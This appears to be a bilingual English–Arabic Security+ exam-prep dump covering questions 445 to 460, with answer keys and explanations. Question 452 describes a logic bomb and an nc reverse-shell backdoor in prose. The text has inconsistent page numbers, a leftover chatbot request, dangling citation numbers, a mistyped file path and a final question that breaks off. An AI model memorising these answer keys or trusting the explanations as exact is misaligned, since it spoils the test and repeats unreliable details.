‫ أي مما‬.‫ فإن مراقب الحركة الجوية قادر على منع وقوع حادث‬، ‫ نتيجة لذلك‬.‫يظهر على الرادار ويحدد أن المعلومات خاطئة‬
‫يلي يعد هذا السيناريو مثالا عليه؟ فيشينق‬
‫ هو شكل من أشكال التصيد الاحتيالي يستخدم المكالمات الصوتية أو الرسائل الصوتية لخداع الضحايا للكشف‬Vishing :‫تفسير‬
Vishing ‫ غالبا ما يستخدم‬.‫ مثل أرقام بطاقات الائتمان أو التفاصيل المصرفية أو كلمات المرور‬، ‫عن المعلومات الشخصية‬
.‫أرقام هواتف مخادعة أو برامج تغيير الصوت أو تقنيات الهندسة الاجتماعية لانتحال شخصية المنظمات أو السلطات الشرعية‬
.‫ مما قد يتسبب في وقوع حادث خطير‬، ‫ تظاهر المتصل بأنه شخص يمكنه تغيير خطة طيران الطائرة‬، ‫في هذا السيناريو‬
445.A financial institution recently joined a bug bounty program to identify security issues in the
institution's new public platform.
Which of the following best describes who the institution is working with to identify security issues?
A. Script kiddie
B. Insider threats
C. Malicious actor
D. Authorized hacker
Answer: D
Explanation:
An authorized hacker, also known as an ethical hacker or a white hat hacker, is someone who uses their
skills and knowledge to find and report security issues in a system or application with the permission of
the owner. An authorized hacker follows the rules and guidelines of the bug bounty program and does
not cause any harm or damage to the system or its users.
.‫ وانضمت مؤسسة مالية مؤخرا إلى برنامج مكافأة الأخطاء لتحديد المسائل الأمنية في المنصة العامة الجديدة للمؤسسة‬-445
‫أي مما يلي يصف بشكل أفضل الأشخاص الذين تعمل معهم المؤسسة لتحديد مشكلات الأمان؟‬
‫القراصنة المصرح لهم‬
‫ هو شخص يستخدم مهاراته‬، ‫ المعروف أيضا باسم المتسلل الأخلاقي أو مخترق القبعة البيضاء‬، ‫ المتسلل المعتمد‬:‫التفسير‬
‫ يتبع المخترق المعتمد قواعد‬.‫ومعرفته للعثور على مشكلات الأمان والإبلاغ عنها في نظام أو تطبيق بإذن من المالك‬
.‫وإرشادات برنامج مكافأة الأخطاء ولا يسبب أي ضرر أو ضرر للنظام أو مستخدميه‬
255 / 198
The safer , easier way to help you pass any IT exams.
446.A malicious actor recently penetrated a company's network and moved laterally to the data center
Upon investigation a forensics firm wants to know what was in the memory on the compromised server.
Which of the following files should be given to the forensics firm?
A. Security
B. Application
C. Dump
D. Syslog
Answer: C
Explanation:
A dump file is a file that contains the contents of memory at a specific point in time. It can be used for
debugging or forensic analysis of a system or an application. It can reveal what was in the memory on
the compromised server, such as processes, variables, passwords, encryption keys, etc.
‫ تريد شركة الطب الشرعي معرفة ما‬، ‫اخترق ممثل خبيث مؤخرا شبكة شركة وانتقل أفقيا إلى مركز البيانات عند التحقيق‬-446
‫ أي من الملفات التالية يجب أن تعطى لشركة الطب الشرعي؟دومب‬.‫كان في الذاكرة على الخادم المخترق‬
‫ يمكن استخدامه لتصحيح الأخطاء أو التحليل‬.‫ ملف التفريغ هو ملف يحتوي على محتويات الذاكرة في وقت محدد‬:‫تفسير‬
‫ مثل العمليات والمتغيرات وكلمات المرور‬، ‫ يمكنه الكشف عما كان في الذاكرة على الخادم المخترق‬.‫الجنائي لنظام أو تطبيق‬
.‫ومفاتيح التشفير وما إلى ذلك‬
447.A company is moving to new location.
The systems administrator has provided the following server room requirements to the facilities staff:
✑ Consistent power levels in case of brownouts or voltage spikes
✑ A minimum of 30 minutes runtime following a power outage
✑ Ability to trigger graceful shutdowns of critical systems
Which of the following would BEST meet the requirements?
A. Maintaining a standby, gas-powered generator
B. Using large surge suppressors on computer equipment
C. Configuring managed PDUs to monitor power levels
D. Deploying an appropriately sized, network-connected UPS device
Answer: D
Explanation:
A UPS (uninterruptible power supply) device is a battery backup system that can provide consistent
power levels in case of brownouts or voltage spikes. It can also provide a minimum of 30 minutes
runtime following a power outage, depending on the size and load of the device. A network-connected
UPS device can also communicate with critical systems and trigger graceful shutdowns if the battery
level is low or the power is not restored.
:‫ قدم مسؤول الأنظمة متطلبات غرفة الخادم التالية لموظفي المرافق‬.‫ شركة تنتقل إلى موقع جديد‬-447
‫✑ مستويات طاقة ثابتة في حالة انقطاع التيار الكهربائي أو ارتفاع الجهد‬
‫ دقيقة بعد انقطاع التيار الكهربائي‬30 ‫✑ وقت تشغيل لا يقل عن‬
‫✑ القدرة على إطلاق عمليات إغلاق رشيقة للأنظمة الحيوية‬
‫أي مما يلي يلبي المتطلبات بشكل أفضل؟‬
‫ بحجم مناسب ومتصل بالشبكة‬UPS ‫نشر جهاز‬
‫ (مصدر الطاقة غير المنقطع) هو نظام احتياطي للبطارية يمكنه توفير مستويات طاقة ثابتة في حالة‬UPS ‫ جهاز‬:‫تفسير‬
‫ دقيقة من وقت التشغيل بعد انقطاع التيار‬30 ‫ يمكن أن يوفر أيضا ما لا يقل عن‬.‫انقطاع التيار الكهربائي أو ارتفاع الجهد‬
‫ المتصل بالشبكة أيضا الاتصال بالأنظمة الحيوية وتشغيل‬UPS ‫ يمكن لجهاز‬.‫ اعتمادا على حجم الجهاز وحمله‬، ‫الكهربائي‬
.‫عمليات إيقاف التشغيل الرشيقة إذا كان مستوى البطارية منخفضا أو لم تتم استعادة الطاقة‬
256 / 198
The safer , easier way to help you pass any IT exams.
448.A security administrator suspects there may be unnecessary services running on a server.
Which of the following tools will the administrator most likely use to confirm the suspicions?
A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum
Answer: A
Explanation:
Nmap is a tool that is used to scan IP addresses and ports in a network and to detect installed
applications. Nmap can help a security administrator determine the services running on a server by
sending various packets to the target and analyzing the responses. Nmap can also perform various
tasks such as OS detection, version detection, script scanning, firewall evasion, and vulnerability
scanning.
‫ أي من الأدوات التالية سيستخدمها‬.‫ يشتبه مسؤول الأمن في احتمال وجود خدمات غير ضرورية تعمل على خادم‬-448
‫المسؤول على الأرجح لتأكيد الشكوك؟ نماب‬
‫ يمكن أن يساعد‬.‫ والمنافذ في الشبكة وللكشف عن التطبيقات المثبتة‬IP ‫ هي أداة تستخدم لفحص عناوين‬Nmap :‫تفسير‬
.‫ مسؤول الأمان في تحديد الخدمات التي تعمل على الخادم عن طريق إرسال حزم مختلفة إلى الهدف وتحليل الردود‬Nmap
‫ أيضا أداء مهام مختلفة مثل اكتشاف نظام التشغيل واكتشاف الإصدار ومسح البرامج النصية والتهرب من‬Nmap ‫يمكن ل‬
.‫جدار الحماية وفحص الثغرات الأمنية‬
449.A security administrator needs to inspect in-transit files on the enterprise network to search for PI I
credit card data, and classification words.
Which of the following would be the best to use?
A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution
Answer: D
Explanation:
A network DLP (Data Loss Prevention) solution is a tool that monitors and controls the data that is
transmitted over a network. It can inspect in-transit files on the enterprise network to search for PII
(Personally Identifiable Information), credit card data, and classification words by using predefined rules
and policies, and then block, encrypt, quarantine, or alert on any sensitive data that is detected or
leaked.
‫ وكلمات‬I PI ‫يحتاج مسؤول الأمان إلى فحص الملفات أثناء النقل على شبكة المؤسسة للبحث عن بيانات بطاقة ائتمان‬
‫ أي مما يلي سيكون الأفضل للاستخدام؟‬.‫التصنيف‬
‫ للشبكة‬DLP
‫ يمكنه‬.‫ للشبكة (منع فقدان البيانات) هو أداة تراقب البيانات التي يتم إرسالها عبر الشبكة وتتحكم فيها‬DLP ‫ حل‬:‫التفسير‬
‫) وبيانات بطاقة الائتمان‬PII( ‫فحص الملفات أثناء النقل على شبكة المؤسسة للبحث عن معلومات تحديد الهوية الشخصية‬
‫ ثم حظر أو تشفير أو عزل أو تنبيه أي بيانات حساسة يتم‬، ‫وكلمات التصنيف باستخدام قواعد وسياسات محددة مسبقا‬
‫اكتشافها أو تسريبه‬
257 / 198
The safer , easier way to help you pass any IT exams.
450.An organization needs to implement more stringent controls over administrator/root credentials and
service accounts.
Requirements for the project include:
* Check-in/checkout of credentials
* The ability to use but not know the password
* Automated password changes
* Logging of access to credentials
Which of the following solutions would meet the requirements?
A. OAuth 2.0
B. Secure Enclave
C. A privileged access management system
D. An OpenID Connect authentication system
Answer: C
Explanation:
A privileged access management (PAM) system is a solution that helps protect organizations against
cyberthreats by monitoring, detecting, and preventing unauthorized privileged access to critical
resources12.
.‫الجذر وحسابات الخدمة‬/‫تحتاج المؤسسة إلى تنفيذ ضوابط أكثر صرامة على بيانات اعتماد المسؤول‬.450
:‫تشمل متطلبات المشروع ما يلي‬
‫الخروج من بيانات الاعتماد‬/‫تسجيل الوصول‬
‫القدرة على استخدام ولكن لا تعرف كلمة المرور‬
‫التغييرات التلقائية لكلمة المرور‬
‫تسجيل الوصول إلى بيانات الاعتماد‬
‫أي الحلول الآتية يلبي المتطلبات؟‬
‫نظام إدارة الوصول المميز‬
‫) حلا يساعد على حماية المؤسسات من التهديدات الإلكترونية من خلال مراقبة الوصول المميز غير‬PAM( ‫ يعد نظام إدارة الوصول المتميز‬:‫تفسير‬
.12‫المصرح به إلى الموارد الهامة واكتشافه ومنعه‬
451.Which Of the following security controls can be used to prevent multiple from using a unique card
swipe and being admitted to a entrance?
A. Visitor logs
B. Faraday cages
C. Access control vestibules
D. Motion detection sensors
Answer: C
Explanation:
Access control vestibules are physical security controls that consist of two sets of doors or gates that
create a small enclosed space between them. Only one door or gate can be opened at a time, and only
one person can enter or exit the vestibule at a time. Access control vestibules can prevent multiple
people from using a unique card swipe and being admitted to a secure entrance, as they require each
person to authenticate individually and prevent tailgating or piggybacking.
‫أي من عناصر التحكم الأمنية التالية يمكن استخدامه لمنع العديد من الأشخاص من استخدام بطاقة فريدة من نوعها والدخول إلى المدخل؟‬.451
‫دهليز التحكم في الوصول‬
‫ دهليز التحكم في الوصول هي عناصر تحكم أمنية مادية تتكون من مجموعتين من الأبواب أو البوابات التي تخلق مساحة مغلقة صغيرة‬:‫تفسير‬
‫ يمكن أن تمنع دهاليز‬.‫ ويمكن لشخص واحد فقط الدخول أو الخروج من الدهليز في كل مرة‬، ‫ يمكن فتح باب أو بوابة واحدة فقط في كل مرة‬.‫بينهما‬
‫ لأنها تتطلب من كل شخص المصادقة بشكل‬، ‫التحكم في الوصول العديد من الأشخاص من استخدام تمريرة بطاقة فريدة وقبولهم في مدخل آمن‬
.‫فردي ومنع الذيل أو التحميل‬
258 / 198
The safer , easier way to help you pass any IT exams.
452.HOTSPOT
An incident has occurred in the production environment.
Analyze the command outputs and identify the type of compromise.
.‫ وقع حادث في بيئة الإنتاج‬:‫هوت سبوت‬.452
.‫تحليل مخرجات الأمر وتحديد نوع التسوية‬
259 / 198
The safer , easier way to help you pass any IT exams.
Answer:
Explanation:
Command Output1 = Logic Bomb
A logic bomb is a type of malicious code that executes when certain conditions are met, such as a
specific date or time, or a specific user action1. In this case, the logic bomb is a script that runs every
minute and checks if there is a user named john in the /etc/password file. If there is, it drops the
production database using a MySQL command3. This could cause severe damage to the system and
the data.
To prevent logic bombs, you should use antivirus software that can detect and remove malicious code,
and also perform regular backups of your data. You should also avoid opening suspicious attachments or
links from unknown sources, and use strong passwords for your accounts1.
Command Output2 = backdoorA backdoor is a type of malicious code that allows an attacker to access a
system or network remotely, bypassing security measures1. In this case, the backdoor is a script that
runs every time the date command is executed and prompts the user to enter their full name. Then, it
opens a reverse shell connection using the nc command and downloads a virus file from a malicious
website using the wget command2. This could allow the attacker to execute commands on the system
and infect it with malware.
To prevent backdoors, you should use antivirus software that can detect and remove malicious code,
and also update your system and applications regularly. You should also
avoid executing unknown commands or scripts from untrusted sources, and use firewall rules to block
unauthorized connections
260 / 198
‫‪The safer , easier way to help you pass any IT exams.‬‬
‫تفسير‪ :‬إخراج الأمر‪ = 1‬قنبلة منطقية القنبلة المنطقية هي نوع من التعليمات البرمجية الضارة التي يتم تنفيذها عند استيفاء‬
‫شروط معينة‪ ،‬مثل تاريخ أو وقت محدد‪ ،‬أو إجراء مستخدم معين‪ .1‬في هذه الحالة ‪ ،‬القنبلة المنطقية عبارة عن برنامج نصي يتم‬
‫‪ .‬إذا كان هناك ‪ ،‬فإنه يسقط ‪ etc / password‬في ملف ‪john /‬تشغيله كل دقيقة ويتحقق مما إذا كان هناك مستخدم يدعى‬
‫‪ .3‬قد يتسبب ذلك في أضرار جسيمة للنظام والبيانات‪ .‬لمنع القنابل المنطقية ‪MySQL ،‬قاعدة بيانات الإنتاج باستخدام أمر‬
‫يجب عليك استخدام برنامج مكافحة الفيروسات الذي يمكنه اكتشاف وإزالة التعليمات البرمجية الضارة ‪ ،‬وكذلك إجراء نسخ‬
‫احتياطية منتظمة لبياناتك‪ .‬يجب أيضا تجنب فتح مرفقات أو روابط مريبة من مصادر غير معروفة‪ ،‬واستخدام كلمات مرور‬
‫قوية لحساباتك‪ .1‬إخراج الأمر‪ = 2‬الباب الخلفيالباب الخلفي هو نوع من التعليمات البرمجية الضارة التي تسمح للمهاجم‬
‫بالوصول إلى نظام أو شبكة عن بعد ‪ ،‬متجاوزا إجراءات الأمان ‪.1‬‬
‫في هذه الحالة ‪ ،‬يكون الباب الخلفي عبارة عن برنامج نصي يتم تشغيله في كل مرة يتم فيها تنفيذ أمر التاريخ ويطالب‬
‫ويقوم بتنزيل ملف فيروس من موقع ‪ nc‬عكسي باستخدام الأمر ‪shell‬المستخدم بإدخال اسمه الكامل‪ .‬بعد ذلك ‪ ،‬يفتح اتصال‬
‫‪ .2‬قد يسمح هذا للمهاجم بتنفيذ الأوامر على النظام وإصابته ببرامج ضارة‪ .‬لمنع الأبواب ‪wget‬ويب ضار باستخدام الأمر‬
‫الخلفية ‪ ،‬يجب عليك استخدام برنامج مكافحة الفيروسات الذي يمكنه اكتشاف التعليمات البرمجية الضارة وإزالتها ‪ ،‬وكذلك‬
‫تحديث نظامك وتطبيقاتك بانتظام‪ .‬يجب عليك أيضا تجنب تنفيذ أوامر أو نصوص غير معروفة من مصادر غير موثوق بها‪،‬‬
‫واستخدم قواعد جدار الحماية لحظر الاتصالات غير المصرح بها‬
‫‪453.A desktop computer was recently stolen from a desk located in the lobby of an office building.‬‬
‫?‪Which of the following would be the best way to secure a replacement computer and deter future theft‬‬
‫‪A. Installing proximity card readers on all entryway doors‬‬
‫‪B. Deploying motion sensor cameras in the lobby‬‬
‫‪C. Encrypting the hard drive on the new desktop‬‬
‫‪D. Using cable locks on the hardware‬‬
‫‪Answer: D‬‬
‫‪Explanation:‬‬
‫‪Using cable locks on the hardware can be an effective way to secure a desktop computer and deter‬‬
‫‪future theft. Cable locks are physical security devices that attach to the computer case and to a nearby‬‬
‫‪stationary object, such as a desk or wall. This makes it more difficult for a thief to remove the computer‬‬
‫‪without damaging it or attracting attention.‬‬
‫‪Installing proximity card readers on all entryway doors can enhance physical security by limiting access‬‬
‫‪to authorized individuals. Deploying motion sensor cameras in the lobby can also help deter theft by‬‬
‫‪capturing images of any unauthorized individuals entering the premises or attempting to steal the‬‬
‫‪computer. Encrypting the hard drive on the replacement desktop can also help protect sensitive data in‬‬
‫‪the event of theft, but it does not provide physical security for the device itself.‬‬
‫‪ -453‬سرق حاسوب مكتبي مؤخرا من مكتب يقع في بهو مبنى للمكاتب‪ .‬أي مما يلي يمثل أفضل طريقة لتأمين جهاز كمبيوتر‬
‫بديل وردع السرقة في المستقبل؟ استخدام أقفال الكابلات على الجهاز‬
‫تفسير‪ :‬يمكن أن يكون استخدام أقفال الكابلات على الأجهزة طريقة فعالة لتأمين كمبيوتر سطح المكتب وردع السرقة في‬
‫المستقبل‪ .‬أقفال الكابلات هي أجهزة أمان مادية يتم توصيلها بعلبة الكمبيوتر وبجسم ثابت قريب ‪ ،‬مثل مكتب أو جدار‪ .‬هذا‬
‫يجعل من الصعب على اللص إزالة الكمبيوتر دون إتلافه أو جذب الانتباه‪ .‬يمكن أن يؤدي تركيب قارئات بطاقات القرب على‬
‫جميع أبواب المداخل إلى تعزيز الأمن المادي عن طريق الحد من الوصول إلى الأفراد المصرح لهم‪ .‬يمكن أن يساعد نشر‬
‫كاميرات استشعار الحركة في الردهة أيضا في ردع السرقة عن طريق التقاط صور لأي أفراد غير مصرح لهم يدخلون المبنى أو‬
‫يحاولون سرقة الكمبيوتر‪ .‬يمكن أن يساعد تشفير القرص الصلب على سطح المكتب البديل أيضا في حماية البيانات الحساسة‬
‫في حالة السرقة ‪ ،‬ولكنه لا يوفر أمانا ماديا للجهاز نفسه‪.‬‬
‫‪261 / 198‬‬
The safer , easier way to help you pass any IT exams.
454.A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new
ERP system for the company. The CISO categorizes the system, selects the controls that apply to the
system, implements the controls, and then assesses the success of the controls before authorizing the
system.
Which of the following is the CISO using to evaluate the environment for this new ERP system?
A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002
Answer: C
Explanation:
The NIST Risk Management Framework (RMF) is a process for evaluating the security of a system and
implementing controls to reduce potential risks associated with it. The RMF process involves
categorizing the system, selecting the controls that apply to the system, implementing the controls, and
then assessing the success of the controls before authorizing the system. For more information on the
NIST Risk Management Framework and other security processes, refer to the CompTIA Security+ SY0601 Official Text Book and Resources.
‫ و يقوم كبير موظفي أمن المعلومات كيسو بتقييم المخاطر التي ينطوي عليها نشر نظام جديد لتخطيط موارد‬-454
‫ وتنفيذ عناصر‬، ‫ واختيار عناصر التحكم التي تنطبق على النظام‬، ‫ يقوم كيسو بتصنيف النظام‬.‫المؤسسات في الشركة‬
‫ أي مما يلي يستخدمه كيسو لتقييم البيئة لنظام تخطيط‬.‫ ثم تقييم نجاح عناصر التحكم قبل تفويض النظام‬، ‫التحكم‬
NIST ‫موارد المؤسسات الجديد هذا؟ إطار عمل إدارة المخاطر‬
‫) هو عملية لتقييم أمان النظام وتنفيذ الضوابط لتقليل المخاطر المحتملة‬RMF( NIST ‫ إطار عمل إدارة المخاطر‬:‫تفسير‬
‫ وتنفيذ عناصر التحكم‬، ‫ واختيار عناصر التحكم التي تنطبق على النظام‬، ‫ تصنيف النظام‬RMF ‫ تتضمن عملية‬.‫المرتبطة به‬
‫ والعمليات‬NIST ‫ لمزيد من المعلومات حول إطار عمل إدارة المخاطر‬.‫ ثم تقييم نجاح عناصر التحكم قبل تفويض النظام‬،
.601 -SY0 + Security CompTIA ‫ راجع الكتاب والموارد الرسمية‬، ‫الأمنية الأخرى‬
262 / 198
The safer , easier way to help you pass any IT exams.
455.A network administrator has been alerted that web pages are experiencing long load times After
determining it is not a routing or DNS issue the administrator logs in to the router, runs a command, and
receives the following output:
CPU 0 percent busy, from 300 sec ago
1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy
Which of the following is The router experiencing?
A. DDoS attack
B. Memory leak
C. Buffer overflow
D. Resource exhaustion
Answer: D
Explanation:
The router is experiencing a resource exhaustion issue. The output from the command indicates that the
CPU is consistently busy, with a 1-second average of 99 percent busy and a 1-minute average of 83
percent busy. This indicates that the router is struggling to keep up with the demands placed on it,
potentially due to a high volume of traffic or other factors. As a result, web pages are experiencing long
load times. This is an example of resource exhaustion, where the router's resources are being
overwhelmed and are unable to meet the demands placed on them. A DDoS attack, memory leak, or
buffer overflow would not typically cause the symptoms described in the scenario.
، DNS ‫تم تنبيه مسؤول شبكة بأن صفحات الويب تواجه أوقات تحميل طويلة بعد تحديد أنها ليست مشكلة في التوجيه أو‬.455
‫ وحدة المعالجة المركزية مشغول‬:‫ و يتلقى الإخراج التالي‬، ‫ وتشغيل أمر‬، ‫يقوم المسؤول بتسجيل الدخول إلى جهاز التوجيه‬
‫ بالمائة‬83 :‫ دقيقة افي‬1 ‫ بالمائة مشغول‬97 :‫ ثوان افي‬5 ‫ بالمائة مشغول‬99 :‫ ثانية افي‬1 ‫ ثانية‬300 ‫ منذ‬، ‫ بالمائة‬0 ‫بنسبة‬
‫مشغول أي مما يلي يعاني منه جهاز التوجيه؟‬
‫استنفاد الموارد‬
‫ يشير الإخراج من الأمر إلى أن وحدة المعالجة المركزية مشغولة باستمرار‬.‫ يواجه جهاز التوجيه مشكلة استنفاد الموارد‬:‫التفسير‬
‫ يشير هذا إلى أن جهاز التوجيه‬.‫ بالمائة‬83 ‫ بالمائة مشغول ومتوسط دقيقة واحدة مشغول بنسبة‬99 ‫ ثانية بنسبة‬1 ‫ بمتوسط‬،
‫ تواجه صفحات‬، ‫ نتيجة لذلك‬.‫ ربما بسبب ارتفاع حجم حركة المرور أو عوامل أخرى‬، ‫يكافح لمواكبة الطلبات المفروضة عليه‬
‫ حيث يتم إغراق موارد جهاز التوجيه وغير قادر على تلبية الطلبات‬، ‫ هذا مثال على استنفاد الموارد‬.‫الويب أوقات تحميل طويلة‬
‫ لن يتسبب هجوم دوس أو تسرب الذاكرة أو تجاوز سعة المخزن المؤقت عادة في ظهور الأعراض الموضحة‬.‫المفروضة عليها‬
.‫في السيناريو‬
263 / 198
The safer , easier way to help you pass any IT exams.
456.A security administrator installed a new web server. The administrator did this to increase the
capacity for an application due to resource exhaustion on another server.
Which of the following algorithms should the administrator use to split the number of the connections on
each server in half?
A. Weighted response
B. Round-robin
C. Least connection
D. Weighted least connection
Answer: B
Explanation:
Round-robin is a type of load balancing algorithm that distributes traffic to a list of servers in rotation. It is
a static algorithm that does not take into account the state of the system for the distribution of tasks. It
assumes that all servers have equal capacity and can handle an equal amount of traffic.
‫ قام المسؤول بذلك لزيادة سعة التطبيق بسبب استنفاد الموارد على خادم‬.‫قام مسؤول الأمن بتثبيت خادم ويب جديد‬.456
‫ أي من الخوارزميات التالية يجب أن يستخدمها المسؤول لتقسيم عدد الاتصالات على كل خادم إلى النصف؟‬.‫آخر‬
‫جولة روبن‬
‫ إنها‬.‫ هو نوع من خوارزمية موازنة التحميل التي توزع حركة المرور على قائمة من الخوادم بالتناوب‬robin-Round :‫تفسير‬
‫ يفترض أن جميع الخوادم لديها سعة متساوية ويمكنها التعامل‬.‫خوارزمية ثابتة لا تأخذ في الاعتبار حالة النظام لتوزيع المهام‬
.‫مع قدر متساو من حركة المرور‬
457.A company would like to protect credit card information that is stored in a database from being
exposed and reused. However, the current POS system does not support encryption.
Which of the following would be BEST suited to secure this information? (Give me related explanation
and references from CompTIA Security+ SY0-601 documents for Correct answer option)
A. Masking
B. Tokenization
C. DLP
D. SSL/TLS
Answer: B
Explanation:
Tokenization replaces sensitive data with non-sensitive data, such as a unique identifier. This means that
the data is still present in the system, but the sensitive information itself is replaced with the token.
Tokenization is more secure than masking, which only obscures the data but does not eliminate it. DLP is
not suitable for this task, as it is designed to prevent the loss or leakage of data from the system.
SSL/TLS can be used to secure the transmission of data, but it cannot prevent the data itself from being
exposed or reused. For more information, please refer to CompTIA Security+ SY0-601 Exam Objectives,
Section 3.3: Explain the security purpose of authentication, authorization and accounting (AAA) services,
and Section 4.7: Explain the purpose and characteristics of various types of encryption.
‫ ومع ذلك‬.‫ وتود إحدى الشركات حماية معلومات بطاقات الائتمان المخزنة في قاعدة بيانات من كشفها وإعادة استخدامها‬-457
‫ أي مما يلي سيكون الأنسب لتأمين هذه المعلومات؟ (أعطني شرحا ومراجع‬.‫ فإن نظام نقاط البيع الحالي لا يدعم التشفير‬،
‫ لخيار الإجابة الصحيحة) الترميز‬601-SY0 + Security CompTIA ‫ذات صلة من مستندات‬
‫ هذا يعني أن البيانات لا تزال موجودة‬.‫ مثل المعرف الفريد‬،‫ يستبدل الرمز المميز البيانات الحساسة ببيانات غير حساسة‬:‫تفسير‬
‫ الذي يحجب‬، ‫ يعد الترميز أكثر أمانا من الإخفاء‬.‫ ولكن يتم استبدال المعلومات الحساسة نفسها بالرمز المميز‬، ‫في النظام‬
‫ يمكن‬.‫ لأنه مصمم لمنع فقدان أو تسرب البيانات من النظام‬، ‫ غير مناسب لهذه المهمة‬DLP .‫البيانات فقط ولكنه لا يزيلها‬
‫ لمزيد من‬.‫ ولكن لا يمكنها منع البيانات نفسها من التعرض أو إعادة استخدامها‬، ‫ لتأمين نقل البيانات‬TLS / SSL ‫استخدام‬
‫ شرح الغرض الأمني من خدمات‬:3.3 ‫ القسم‬، 601-SY0 + Security CompTIA ‫ يرجى الرجوع إلى أهداف اختبار‬، ‫المعلومات‬
.‫ شرح الغرض من أنواع التشفير المختلفة وخصائصها‬:4.7 ‫ والقسم‬، )AAA( ‫المصادقة والتفويض والمحاسبة‬
264 / 198
The safer , easier way to help you pass any IT exams.
458.A security administrator recently used an internal CA to issue a certificate to a public application. A
user tries to reach the application but receives a message stating, “Your connection is not private.".
Which of the following is the best way to fix this issue?
A. Ignore the warning and continue to use the application normally.
B. Install the certificate on each endpoint that needs to use the application.
C. Send the new certificate to the users to install on their browsers.
D. Send a CSR to a known CA and install the signed certificate on the application's server.
Answer: D
Explanation:
A certificate issued by an internal CA is not trusted by default by external users or applications.
Therefore, when a user tries to reach the application that uses an internal CA certificate, they will receive
a warning message that their connection is not private1. The best way to fix this issue is to use a
certificate signed by a well-known public CA that is trusted by most browsers and operating systems1. To
do this, the security administrator needs to send a certificate signing request (CSR) to a public CA and
install the signed certificate on the application’s server2. The other options are not recommended or
feasible. Ignoring the warning and continuing to use the application normally is insecure and exposes the
user to potential man-in-the-middle attacks3. Installing the certificate on each endpoint that needs to use
the application is impractical and cumbersome, especially if there are many users or devices involved3.
Sending the new certificate to the users to install on their browsers is also inconvenient and may not
work for some browsers or devices3.
‫ يحاول المستخدم الوصول إلى‬.‫استخدم مسؤول أمني مؤخرا المرجع المصدق الداخلي لإصدار شهادة لتطبيق عام‬.458
‫ أي مما يلي هو أفضل طريقة لإصلاح هذه المشكلة؟‬."‫التطبيق ولكنه يتلقى رسالة تفيد بأن "اتصالك ليس خاصا‬
.‫ إلى مرجع مصدق معروف وقم بتثبيت الشهادة الموقعة على خادم التطبيق‬CSR ‫أرسل‬
‫ الشهادة الصادرة عن مرجع مصدق داخلي غير موثوق بها بشكل افتراضي من قبل المستخدمين الخارجيين أو‬:‫تفسير‬
‫ سيتلقى رسالة تحذير تفيد‬،‫ داخلية‬CA ‫ عندما يحاول مستخدم الوصول إلى التطبيق الذي يستخدم شهادة‬،‫ لذلك‬.‫التطبيقات‬
‫ أفضل طريقة لإصلاح هذه المشكلة هي استخدام شهادة موقعة من مرجع مصدق عام معروف‬.1‫بأن اتصاله غير خاص‬
‫ يحتاج مسؤول الأمان إلى إرسال طلب توقيع شهادة‬،‫ للقيام بذلك‬.1‫موثوق به من قبل معظم المتصفحات وأنظمة التشغيل‬
‫ إن‬.‫ الخيارات الأخرى غير موصى بها أو مجدية‬.2‫) إلى مرجع مصدق عام وتثبيت الشهادة الموقعة على خادم التطبيق‬CSR(
‫تجاهل التحذير والاستمرار في استخدام التطبيق بشكل طبيعي أمر غير آمن ويعرض المستخدم لهجمات رجل في الوسط‬
‫ خاصة إذا كان هناك‬،‫ يعد تثبيت الشهادة على كل نقطة نهاية تحتاج إلى استخدام التطبيق أمرا غير عملي ومرهق‬.3‫المحتملة‬
‫ يعد إرسال الشهادة الجديدة إلى المستخدمين لتثبيتها على المستعرضات‬.3‫العديد من المستخدمين أو الأجهزة المعنية‬
.3‫الخاصة بهم أمرا غير مريح أيضا وقد لا يعمل مع بعض المتصفحات أو الأجهزة‬
265 / 198
The safer , easier way to help you pass any IT exams.
459.A building manager is concerned about people going in and out of the office during non-working
hours. Which of the following physical security controls would provide the best solution?
A. Cameras
B. Badges
C. Locks
D. Bollards
Answer: B
Explanation:
Badges are physical security controls that provide a way to identify and authenticate authorized
individuals who need to access a building or a restricted area. Badges can also be used to track the
entry and exit times of people and monitor their movements within the premises. Badges can help deter
unauthorized access by requiring people to present a valid credential before entering or leaving the
office. Badges can also help prevent tailgating, which is when an unauthorized person follows a
authorized person through a door or gate. Badges can be integrated with other security systems, such
as locks, alarms, cameras, or biometrics, to enhance the level of protection.
‫ أي من ضوابط‬.‫ ويشعر مدير المبنى بالقلق إزاء الأشخاص الذين يدخلون المكتب ويخرجون منه في غير ساعات العمل‬-459
‫الأمان المادية التالية سيوفر الحل الأفضل؟ شارات‬
‫ الشارات هي ضوابط أمنية مادية توفر طريقة لتحديد ومصادقة الأفراد المصرح لهم الذين يحتاجون إلى الوصول إلى‬:‫تفسير‬
.‫ يمكن أيضا استخدام الشارات لتتبع أوقات دخول وخروج الأشخاص ومراقبة تحركاتهم داخل المبنى‬.‫مبنى أو منطقة محظورة‬
‫يمكن أن تساعد الشارات في ردع الوصول غير المصرح به من خلال مطالبة الأشخاص بتقديم بيانات اعتماد صالحة قبل‬
‫ وهو عندما يتبع شخص غير مصرح له شخصا‬، ‫ يمكن أن تساعد الشارات أيضا في منع الذيل‬.‫الدخول إلى المكتب أو مغادرته‬
‫ مثل الأقفال أو أجهزة الإنذار أو الكاميرات أو القياسات‬، ‫ يمكن دمج الشارات مع أنظمة الأمان الأخرى‬.‫مفوضا عبر باب أو بوابة‬
.‫ لتعزيز مستوى الحماية‬، ‫الحيوية‬
266 / 198
The safer , easier way to help you pass any IT exams.
460.A small, local company experienced a ransomware attack. The company has one web-facing server
and a few workstations. Everything is behind an ISP firewall. A single web-facing server
is set up on the router to forward all ports so that the server is viewable from the internet.
The companyuses an older version of third-party software to manage the website.
The assets were never patched.
Which of the following should be done to prevent an attack like this from happening again? (Select
three).
A. Install DLP software to prevent data loss.
B. Use the latest version of software.
C. Install a SIEM device.
D. Implement MDM.
E. Implement a screened subnet for the web server.
F. Install an endpoint security solution.
G. Update the website certificate and revoke the existing ones.
H. Deploy additional network sensors.
Answer: B,E,F
‫ تمتلك الشركة خادما واحدا مواجها للويب وعدد قليل من محطات‬.‫ تعرضت شركة محلية صغيرة لهجوم برامج الفدية‬-460
.‫ كل شيء وراء جدار حماية مزود خدمة الإنترنت‬.‫العمل‬
‫خادم واحد مواجه‬
